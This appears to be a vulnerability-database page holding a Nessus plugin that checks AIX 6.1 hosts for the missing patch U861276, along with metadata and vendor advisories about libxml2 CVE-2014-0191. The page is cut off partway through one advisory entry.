ID AIX_U861276.NASL Type nessus Reporter This script is Copyright (C) 2014-2021 Tenable Network Security, Inc. Modified 2014-11-10T00:00:00
Description
The remote host is missing AIX PTF U861276, which is related to the
security of the package bos.rte.control.
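Libxml2 is vulnerable to a denial of service, caused by the expansion
of internal entities within the xmlParserHandlePEReference() function.
The CVE-2014-0191 record reproduced further down this page describes the same flaw as libxml2 loading external parameter entities regardless of whether entity substitution or validation is enabled, which lets a crafted XML document consume resources.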
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were extracted
# from AIX Security PTF U861276. The text itself is copyright (C)
# International Business Machines Corp.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Metadata branch: taken only when `description` is true. It declares the
# plugin's identity, references and prerequisites, then leaves via exit(0)
# so none of the host checks further down run in this pass.
if (description)
{
  # Plugin identity and revision bookkeeping.
  script_id(79062);
  script_version("1.3");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/04");

  # The one CVE this PTF check is mapped to.
  script_cve_id("CVE-2014-0191");

  script_name(english:"AIX 6.1 TL 9 : bos.rte.control (U861276)");
  script_summary(english:"Check for PTF U861276");

  script_set_attribute(attribute:"synopsis", value:"The remote AIX host is missing a vendor-supplied security patch.");

  # Multi-line literal: the continuation lines must stay at column 0,
  # otherwise the reported text would gain leading whitespace.
  script_set_attribute(attribute:"description", value:"The remote host is missing AIX PTF U861276, which is related to the
security of the package bos.rte.control.
Libxml2 is vulnerable to a denial of service, caused by the expansion
of internal entities within the xmlParserHandlePEReference()."
  );

  # NOTE(review): the vendor reference below is a plain-http URL.
  script_set_attribute(attribute:"see_also", value:"http://www-01.ibm.com/support/docview.wss?uid=isg1IV62448");
  script_set_attribute(attribute:"solution", value:"Install the appropriate missing security-related fix.");

  # CVSS v2 base vector as written: network access, medium complexity,
  # no authentication, partial availability impact only.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P");

  # Declared as a local check scoped to the AIX 6.1 CPE.
  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:ibm:aix:6.1");

  script_set_attribute(attribute:"vuln_publication_date", value:"2014/07/14");
  script_set_attribute(attribute:"patch_publication_date", value:"2014/07/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2014/11/10");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.");
  script_family(english:"AIX Local Security Checks");

  # Prerequisites: ssh_get_info.nasl must run first and the four KB keys
  # listed here must be present.
  # NOTE(review): Host/AIX/oslevel is required here but never read directly
  # by this script; presumably it is consumed inside aix.inc. Confirm.
  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/AIX/oslevel", "Host/AIX/version", "Host/AIX/lslpp");

  exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("aix.inc");
# Preconditions: hand off to audit() unless local checks are enabled, an AIX
# version is recorded in the KB, and the Host/AIX/lslpp package data exists.
if (!get_kb_item("Host/local_checks_enabled"))
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/AIX/version"))
  audit(AUDIT_OS_NOT, "AIX");
if (!get_kb_item("Host/AIX/lslpp"))
  audit(AUDIT_PACKAGE_LIST_MISSING);

# A negative result from aix_check_patch() is what marks the host as
# missing PTF U861276 for bos.rte.control.6.1.9.30 at level 610009.
# NOTE(review): the exact return-code contract is defined in aix.inc; confirm.
# As far as this script shows, the finding is based on collected KB data
# only; nothing here exercises the libxml2 parser itself.
patch_missing = FALSE;
if (aix_check_patch(ml:"610009", patch:"U861276", package:"bos.rte.control.6.1.9.30") < 0)
  patch_missing = TRUE;

if (!patch_missing)
  audit(AUDIT_HOST_NOT, "affected");
else
{
  # Attach the aix.inc report text only when verbosity is above zero.
  if (report_verbosity > 0)
    security_warning(port:0, extra:aix_report_get());
  else
    security_warning(0);
  exit(0);
}
{"id": "AIX_U861276.NASL", "bulletinFamily": "scanner", "title": "AIX 6.1 TL 9 : bos.rte.control (U861276)", "description": "The remote host is missing AIX PTF U861276, which is related to the\nsecurity of the package bos.rte.control.\n\nLibxml2 is vulnerable to a denial of service, caused by the expansion\nof internal entities within the xmlParserHandlePEReference().", "published": "2014-11-10T00:00:00", "modified": "2014-11-10T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "href": "https://www.tenable.com/plugins/nessus/79062", "reporter": "This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.", "references": ["http://www-01.ibm.com/support/docview.wss?uid=isg1IV62448"], "cvelist": ["CVE-2014-0191"], "type": "nessus", "lastseen": "2021-01-06T09:18:27", "edition": 23, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-0191"]}, {"type": "centos", "idList": ["CESA-2015:0749", "CESA-2014:0513"]}, {"type": "fedora", "idList": ["FEDORA:3CDAE222C7", "FEDORA:C864B601FC15", "FEDORA:831F2608779C", "FEDORA:DDB4D6078C27", "FEDORA:A355960879E0"]}, {"type": "ubuntu", "idList": ["USN-2214-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2978-1:D9688", "DEBIAN:DLA-0016-1:08E9F", "DEBIAN:DSA-2978-2:69125", "DEBIAN:8613E99116DFAD11AB50FECC40F571E0:036E2", "DEBIAN:DLA-151-1:ED039", "DEBIAN:DLA-80-1:DE419"]}, {"type": "freebsd", "idList": ["EFDD0EDC-DA3D-11E3-9ECB-2C4138874F7D"]}, {"type": "redhat", "idList": ["RHSA-2015:0749", "RHSA-2014:0513"]}, {"type": "gentoo", "idList": ["GLSA-201409-08"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-16.NASL", "AIX_IV62447.NASL", "MANDRIVA_MDVSA-2014-086.NASL", "ALA_ALAS-2014-341.NASL", "FEDORA_2014-17573.NASL", "AIX_U862099.NASL", "FEDORA_2014-17609.NASL", "SOLARIS11_LIBXML2_20140819.NASL", "REDHAT-RHSA-2015-0749.NASL", "DEBIAN_DSA-2978.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310121271", "OPENVAS:1361412562310841826", 
"OPENVAS:702978", "OPENVAS:1361412562310868768", "OPENVAS:1361412562310702978", "OPENVAS:1361412562310871346", "OPENVAS:1361412562310123148", "OPENVAS:1361412562310882149", "OPENVAS:1361412562310120474", "OPENVAS:1361412562310868769"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30700", "SECURITYVULNS:VULN:14630", "SECURITYVULNS:VULN:14631", "SECURITYVULNS:VULN:13754", "SECURITYVULNS:DOC:31491", "SECURITYVULNS:VULN:14755", "SECURITYVULNS:VULN:14233", "SECURITYVULNS:DOC:32392", "SECURITYVULNS:DOC:32390"]}, {"type": "amazon", "idList": ["ALAS-2014-341"]}, {"type": "aix", "idList": ["LIBXML2_ADVISORY.ASC"]}, {"type": "oraclelinux", "idList": ["ELSA-2014-0513", "ELSA-2015-0749", "ELSA-2015-2550"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C06A4B2B66645C13B898B81F53653130"]}, {"type": "archlinux", "idList": ["ASA-201410-12"]}, {"type": "vmware", "idList": ["VMSA-2014-0012"]}, {"type": "apple", "idList": ["APPLE:HT205795"]}, {"type": "suse", "idList": ["SUSE-SU-2017:2699-1", "SUSE-SU-2017:2700-1"]}], "modified": "2021-01-06T09:18:27", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2021-01-06T09:18:27", "rev": 2}, "vulnersScore": 6.1}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were extracted\n# from AIX Security PTF U861276. 
The text itself is copyright (C)\n# International Business Machines Corp.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79062);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2014-0191\");\n\n script_name(english:\"AIX 6.1 TL 9 : bos.rte.control (U861276)\");\n script_summary(english:\"Check for PTF U861276\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is missing AIX PTF U861276, which is related to the\nsecurity of the package bos.rte.control.\n\nLibxml2 is vulnerable to a denial of service, caused by the expansion\nof internal entities within the xmlParserHandlePEReference().\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www-01.ibm.com/support/docview.wss?uid=isg1IV62448\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate missing security-related fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AIX/oslevel\", \"Host/AIX/version\", 
\"Host/AIX/lslpp\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nflag = 0;\n\nif ( aix_check_patch(ml:\"610009\", patch:\"U861276\", package:\"bos.rte.control.6.1.9.30\") < 0 ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "AIX Local Security Checks", "pluginID": "79062", "cpe": ["cpe:/o:ibm:aix:6.1"], "scheme": null}
{"cve": [{"lastseen": "2020-10-03T12:01:11", "description": "The xmlParserHandlePEReference function in parser.c in libxml2 before 2.9.2, as used in Web Listener in Oracle HTTP Server in Oracle Fusion Middleware 11.1.1.7.0, 12.1.2.0, and 12.1.3.0 and other products, loads external parameter entities regardless of whether entity substitution or validation is enabled, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XML document.", "edition": 3, "cvss3": {}, "published": "2015-01-21T14:59:00", "title": "CVE-2014-0191", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0191"], "modified": "2017-08-29T01:34:00", "cpe": ["cpe:/a:oracle:fusion_middleware:11.1.1.7.0", "cpe:/a:oracle:fusion_middleware:12.1.2.0.0", "cpe:/a:oracle:fusion_middleware:12.1.3.0.0"], "id": "CVE-2014-0191", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0191", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:fusion_middleware:12.1.2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:fusion_middleware:11.1.1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:fusion_middleware:12.1.3.0.0:*:*:*:*:*:*:*"]}], "centos": [{"lastseen": "2019-12-20T18:28:11", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191"], "description": "**CentOS Errata and Security Advisory** CESA-2015:0749\n\n\nThe libxml2 library is a development toolbox providing the implementation\nof various XML standards.\n\nIt was discovered that 
libxml2 loaded external parameter entities even when\nentity substitution was disabled. A remote attacker able to provide a\nspecially crafted XML file to an application linked against libxml2 could\nuse this flaw to conduct XML External Entity (XXE) attacks, possibly\nresulting in a denial of service or an information leak on the system.\n(CVE-2014-0191)\n\nThe CVE-2014-0191 issue was discovered by Daniel P. Berrange of Red Hat.\n\nAll libxml2 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. The desktop must be\nrestarted (log out, then log back in) for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-April/033067.html\n\n**Affected packages:**\nlibxml2\nlibxml2-devel\nlibxml2-python\nlibxml2-static\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-0749.html", "edition": 3, "modified": "2015-04-01T03:26:34", "published": "2015-04-01T03:26:34", "href": "http://lists.centos.org/pipermail/centos-announce/2015-April/033067.html", "id": "CESA-2015:0749", "title": "libxml2 security update", "type": "centos", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-12-20T18:27:59", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191", "CVE-2013-2877"], "description": "**CentOS Errata and Security Advisory** CESA-2014:0513\n\n\nThe libxml2 library is a development toolbox providing the implementation\nof various XML standards.\n\nIt was discovered that libxml2 loaded external parameter entities even when\nentity substitution was disabled. 
A remote attacker able to provide a\nspecially crafted XML file to an application linked against libxml2 could\nuse this flaw to conduct XML External Entity (XXE) attacks, possibly\nresulting in a denial of service or an information leak on the system.\n(CVE-2014-0191)\n\nAn out-of-bounds read flaw was found in the way libxml2 detected the end of\nan XML file. A remote attacker could provide a specially crafted XML file\nthat, when processed by an application linked against libxml2, could cause\nthe application to crash. (CVE-2013-2877)\n\nThe CVE-2014-0191 issue was discovered by Daniel P. Berrange of Red Hat.\n\nAll libxml2 users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The desktop must be\nrestarted (log out, then log back in) for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-May/032341.html\n\n**Affected packages:**\nlibxml2\nlibxml2-devel\nlibxml2-python\nlibxml2-static\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0513.html", "edition": 3, "modified": "2014-05-19T13:08:11", "published": "2014-05-19T13:08:11", "href": "http://lists.centos.org/pipermail/centos-announce/2014-May/032341.html", "id": "CESA-2014:0513", "title": "libxml2 security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191"], "description": "MinGW Windows libxml2 XML processing library. 
", "modified": "2015-01-02T05:01:30", "published": "2015-01-02T05:01:30", "id": "FEDORA:DDB4D6078C27", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: mingw-libxml2-2.9.2-1.fc21", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191"], "description": "MinGW Windows libxml2 XML processing library. ", "modified": "2015-01-02T05:01:49", "published": "2015-01-02T05:01:49", "id": "FEDORA:831F2608779C", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mingw-libxml2-2.9.2-1.fc20", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191", "CVE-2014-3660"], "description": "This library allows to manipulate XML files. It includes support to read, modify and write XML and HTML files. There is DTDs support this includes parsing and validation even with complex DtDs, either at parse time or later once the document has been modified. The output can be a simple SAX stream or and in-memory DOM like representations. In this case one can use the built-in XPath and XPointer implementation to select sub nodes or ranges. A flexible Input/Output mechanism is available, with existing HTTP and FTP modules and combined to an URI library. ", "modified": "2015-04-07T07:30:19", "published": "2015-04-07T07:30:19", "id": "FEDORA:A355960879E0", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: libxml2-2.9.1-7.fc21", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191", "CVE-2014-3660"], "description": "This library allows to manipulate XML files. It includes support to read, modify and write XML and HTML files. 
There is DTDs support this includes parsing and validation even with complex DtDs, either at parse time or later once the document has been modified. The output can be a simple SAX stream or and in-memory DOM like representations. In this case one can use the built-in XPath and XPointer implementation to select sub nodes or ranges. A flexible Input/Output mechanism is available, with existing HTTP and FTP modules and combined to an URI library. ", "modified": "2015-04-11T09:07:39", "published": "2015-04-11T09:07:39", "id": "FEDORA:C864B601FC15", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: libxml2-2.9.1-4.fc20", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191", "CVE-2014-3494", "CVE-2014-5033"], "description": "Libraries for KDE 4. ", "modified": "2014-09-27T09:47:46", "published": "2014-09-27T09:47:46", "id": "FEDORA:3CDAE222C7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: kdelibs-4.14.1-1.fc20", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:42:38", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191"], "description": "Daniel Berrange discovered that libxml2 would incorrectly perform entity \nsubstitution even when requested not to. 
If a user or automated system were \ntricked into opening a specially crafted document, an attacker could \npossibly cause resource consumption, resulting in a denial of service.", "edition": 5, "modified": "2014-05-15T00:00:00", "published": "2014-05-15T00:00:00", "id": "USN-2214-1", "href": "https://ubuntu.com/security/notices/USN-2214-1", "title": "libxml2 vulnerability", "type": "ubuntu", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2020-11-11T13:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191"], "description": "Package : libxml2\nVersion : 2.7.8.dfsg-2+squeeze9\nCVE ID : CVE-2014-0191\nDebian Bug : #747309\n\nDaniel P. Berrange discovered a denial of service vulnerability in\nlibxml2 entity substitution.\n\n", "edition": 7, "modified": "2014-07-19T15:16:39", "published": "2014-07-19T15:16:39", "id": "DEBIAN:DLA-0016-1:08E9F", "href": "https://lists.debian.org/debian-lts-announce/2014/debian-lts-announce-201407/msg00005.html", "title": "[DLA-0016-1] libxml2 security update", "type": "debian", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-30T02:23:06", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2978-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJuly 11, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libxml2\nCVE ID : CVE-2014-0191\n\nDaniel P. 
Berrange discovered a denial of service vulnerability in \nlibxml2 entity substitution.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 2.8.0+dfsg1-7+wheezy1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.9.1+dfsg1-4.\n\nWe recommend that you upgrade your libxml2 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2014-07-11T14:30:16", "published": "2014-07-11T14:30:16", "id": "DEBIAN:DSA-2978-1:D9688", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00159.html", "title": "[SECURITY] [DSA 2978-1] libxml2 security update", "type": "debian", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-30T02:22:22", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191"], "description": "Package : libxml2\nVersion : 2.7.8.dfsg-2+squeeze9\nCVE ID : CVE-2014-0191\nDebian Bug : #747309\n\nDaniel P. Berrange discovered a denial of service vulnerability in\nlibxml2 entity substitution.\n\n", "edition": 2, "modified": "2014-07-19T14:46:40", "published": "2014-07-19T14:46:40", "id": "DEBIAN:8613E99116DFAD11AB50FECC40F571E0:036E2", "href": "https://lists.debian.org/debian-lts-announce/2014/debian-lts-announce-201407/msg00004.html", "title": "libxml2 security update", "type": "debian", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-11-11T13:28:08", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191", "CVE-2014-3660"], "description": "Package : libxml2\nVersion : 2.7.8.dfsg-2+squeeze11\nCVE ID : CVE-2014-0191 CVE-2014-3660\nDebian Bug : 768089\n\nIt was discovered that the update released for libxml2 in DSA 2978 fixing\nCVE-2014-0191 was incomplete. 
This caused libxml2 to still fetch external\nentities regardless of whether entity substitution or validation is\nenabled.\n\nIn addition, this update addresses a regression introduced in DSA 3057 by\nthe patch fixing CVE-2014-3660. This caused libxml2 to not parse an\nentity when it's used first in another entity referenced from an\nattribute value.\n\n", "edition": 7, "modified": "2015-02-07T16:15:24", "published": "2015-02-07T16:15:24", "id": "DEBIAN:DLA-151-1:ED039", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201502/msg00005.html", "title": "[SECURITY] [DLA 151-1] libxml2 security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-08-12T00:53:19", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191", "CVE-2014-3660"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2978-2 security@debian.org\nhttp://www.debian.org/security/ Alessandro Ghedini\nFebruary 06, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libxml2\nCVE ID : CVE-2014-0191 CVE-2014-3660\nDebian Bug : 768089\n\nIt was discovered that the update released for libxml2 in DSA 2978 fixing\nCVE-2014-0191 was incomplete. This caused libxml2 to still fetch external\nentities regardless of whether entity substitution or validation is\nenabled.\n\nIn addition, this update addresses a regression introduced in DSA 3057 by\nthe patch fixing CVE-2014-3660. 
This caused libxml2 to not parse an\nentity when it's used first in another entity referenced from an\nattribute value.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 2.8.0+dfsg1-7+wheezy3.\n\nFor the upcoming stable distribution (jessie), these problems have been\nfixed in version 2.9.1+dfsg1-4.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.9.1+dfsg1-4.\n\nWe recommend that you upgrade your libxml2 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2015-02-06T22:41:13", "published": "2015-02-06T22:41:13", "id": "DEBIAN:DSA-2978-2:69125", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00039.html", "title": "[SECURITY] [DSA 2978-2] libxml2 security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-11-11T13:21:42", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191", "CVE-2014-3660"], "description": "Package : libxml2\nVersion : 2.7.8.dfsg-2+squeeze10\nCVE ID : CVE-2014-0191 CVE-2014-3660\n\nSogeti found a denial of service flaw in libxml2, a library providing\nsupport to read, modify and write XML and HTML files. 
A remote attacker\ncould provide a specially crafted XML file that, when processed by an\napplication using libxml2, would lead to excessive CPU consumption\n(denial of service) based on excessive entity substitutions, even if\nentity substitution was disabled, which is the parser default behavior.\n(CVE-2014-3660)\n\nIn addition, this update addresses a misapplied chunk for a patch\nreleased the previous version (#762864).\n", "edition": 9, "modified": "2014-10-29T21:45:26", "published": "2014-10-29T21:45:26", "id": "DEBIAN:DLA-80-1:DE419", "href": "https://lists.debian.org/debian-lts-announce/2014/debian-lts-announce-201410/msg00014.html", "title": "[SECURITY] [DLA 80-1] libxml2 security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:28", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191"], "description": "\nStefan Cornelius reports:\n\nIt was discovered that libxml2, a library providing\n\t support to read, modify and write XML files, incorrectly\n\t performs entity substitution in the doctype prolog, even if\n\t the application using libxml2 disabled any entity\n\t substitution. 
A remote attacker could provide a\n\t specially-crafted XML file that, when processed, would lead\n\t to the exhaustion of CPU and memory resources or file\n\t descriptors.\nThis issue was discovered by Daniel Berrange of Red Hat.\n\n", "edition": 4, "modified": "2015-07-15T00:00:00", "published": "2013-12-03T00:00:00", "id": "EFDD0EDC-DA3D-11E3-9ECB-2C4138874F7D", "href": "https://vuxml.freebsd.org/freebsd/efdd0edc-da3d-11e3-9ecb-2c4138874f7d.html", "title": "libxml2 -- entity substitution DoS", "type": "freebsd", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:45:00", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191"], "description": "The libxml2 library is a development toolbox providing the implementation\nof various XML standards.\n\nIt was discovered that libxml2 loaded external parameter entities even when\nentity substitution was disabled. A remote attacker able to provide a\nspecially crafted XML file to an application linked against libxml2 could\nuse this flaw to conduct XML External Entity (XXE) attacks, possibly\nresulting in a denial of service or an information leak on the system.\n(CVE-2014-0191)\n\nThe CVE-2014-0191 issue was discovered by Daniel P. Berrange of Red Hat.\n\nAll libxml2 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. 
The desktop must be\nrestarted (log out, then log back in) for this update to take effect.\n", "modified": "2018-04-12T03:33:29", "published": "2015-03-30T04:00:00", "id": "RHSA-2015:0749", "href": "https://access.redhat.com/errata/RHSA-2015:0749", "type": "redhat", "title": "(RHSA-2015:0749) Moderate: libxml2 security update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-08-13T18:45:21", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2877", "CVE-2014-0191"], "description": "The libxml2 library is a development toolbox providing the implementation\nof various XML standards.\n\nIt was discovered that libxml2 loaded external parameter entities even when\nentity substitution was disabled. A remote attacker able to provide a\nspecially crafted XML file to an application linked against libxml2 could\nuse this flaw to conduct XML External Entity (XXE) attacks, possibly\nresulting in a denial of service or an information leak on the system.\n(CVE-2014-0191)\n\nAn out-of-bounds read flaw was found in the way libxml2 detected the end of\nan XML file. A remote attacker could provide a specially crafted XML file\nthat, when processed by an application linked against libxml2, could cause\nthe application to crash. (CVE-2013-2877)\n\nThe CVE-2014-0191 issue was discovered by Daniel P. Berrange of Red Hat.\n\nAll libxml2 users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
The desktop must be\nrestarted (log out, then log back in) for this update to take effect.\n", "modified": "2018-06-06T20:24:12", "published": "2014-05-19T04:00:00", "id": "RHSA-2014:0513", "href": "https://access.redhat.com/errata/RHSA-2014:0513", "type": "redhat", "title": "(RHSA-2014:0513) Moderate: libxml2 security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:29", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191"], "edition": 1, "description": "### Background\n\nlibxml2 is the XML C parser and toolkit developed for the Gnome project.\n\n### Description\n\nA vulnerability in the xmlParserHandlePEReference() function of parser.c, when expanding entity references, can be exploited to consume large amounts of memory and cause a crash or hang. \n\n### Impact\n\nA remote attacker may be able to cause Denial of Service via a specially crafted XML file containing malicious attributes. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll libxml2 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-libs/libxml2-2.9.1-r4\"", "modified": "2014-09-19T00:00:00", "published": "2014-09-19T00:00:00", "id": "GLSA-201409-08", "href": "https://security.gentoo.org/glsa/201409-08", "type": "gentoo", "title": "libxml2: Denial of Service", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:55", "bulletinFamily": "software", "cvelist": ["CVE-2014-0191"], "description": "CPU exhaustion on XML 